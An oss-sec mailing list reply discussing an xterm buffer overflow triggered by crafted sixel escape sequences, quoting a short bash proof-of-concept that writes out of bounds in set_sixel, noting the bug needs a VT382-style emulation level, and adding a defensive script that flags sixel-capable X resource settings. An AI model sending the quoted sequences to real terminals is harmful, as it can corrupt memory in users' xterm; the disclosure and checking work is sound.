oss-sec mailing list archives
Re: Re: xterm buffer overflow via crafted sixel
From: Jakub Wilk <jwilk () jwilk net>
Date: Mon, 31 Jan 2022 11:48:15 +0100
* Tavis Ormandy <taviso () gmail com>, 2022-01-30, 18:39:
> I can repro here, here is a testcase:
>
> #!/bin/bash
> printf "\ePq"
> printf "#%hhu;2;%hhu;%hhu;%hhu" 0x41 100 100 100
> printf "#%hhu!%u@" 0x41 0x7fffffff
> printf "#%hhu!%u@" 0x41 0x7fffffff
> printf "\e\\"
>
> That should wrap context->col, and write a 'A' to graphic->pixels oob in
> set_sixel.
>
> I use `XTerm*decTerminalID: vt382` in .Xresources, not sure if that
> matters.
I think it does. https://invisible-island.net/xterm/ctlseqs/ctlseqs.html#h3-Sixel-Graphics says "xterm [needs to be] configured as VT240, VT241, VT330, VT340 or VT382" for Sixels to be supported. And indeed, I can't reproduce the bug with the default emulation level (VT420).
If you don't want to tinker with your .Xresources for testing, you can use the -ti option instead.
-- Jakub Wilk
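
The configuration dependency described in the message above can be checked on a host with the following added example, which is not part of the original message or of xterm. It reads X resource text and reports any `decTerminalID` setting that selects one of the sixel-capable levels named on the ctlseqs page. The function names, the loose matching on the resource name, and the sample input are assumptions of this example.

```bash
#!/bin/bash
# Added example (not xterm code): flag X resource settings that put xterm
# into a sixel-capable emulation level. Names are matched by their last
# component only; this does not implement full X resource precedence.

# Terminal IDs the ctlseqs page lists as required for sixel support.
SIXEL_IDS="240 241 330 340 382"

# sixel_capable_id VALUE: exit 0 if VALUE ("vt382", "340", ...) is listed.
sixel_capable_id() {
    local digits id
    # xterm ignores leading non-digit characters in decTerminalID.
    digits=$(printf '%s' "$1" | sed -e 's/^[^0-9]*//' -e 's/[^0-9].*$//')
    for id in $SIXEL_IDS; do
        [ "$digits" = "$id" ] && return 0
    done
    return 1
}

# scan_resources: read `xrdb -query` or .Xresources text on stdin, print
# each sixel-capable decTerminalID setting, exit 0 if any was found.
scan_resources() {
    local line name value found=1
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            '!'*|'#'*|'') continue ;;       # comments, cpp lines, blanks
        esac
        name=${line%%:*}
        [ "$name" = "$line" ] && continue   # no colon: not a resource
        value=$(printf '%s' "${line#*:}" | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//')
        name=$(printf '%s' "$name" | tr -d '[:space:]')
        case "$name" in
            *decTerminalID|*DecTerminalID)
                if sixel_capable_id "$value"; then
                    printf 'sixel-capable: %s = %s\n' "$name" "$value"
                    found=0
                fi ;;
        esac
    done
    return "$found"
}

# Constructed sample input, not taken from a real system.
SAMPLE='! constructed sample
XTerm*faceName: Monospace
XTerm*decTerminalID: vt382'

printf '%s\n' "$SAMPLE" | scan_resources || echo "no sixel-capable ID set"
```

On a live system the input would come from `xrdb -query`; a value passed to xterm with `-ti` can be checked directly with `sixel_capable_id`.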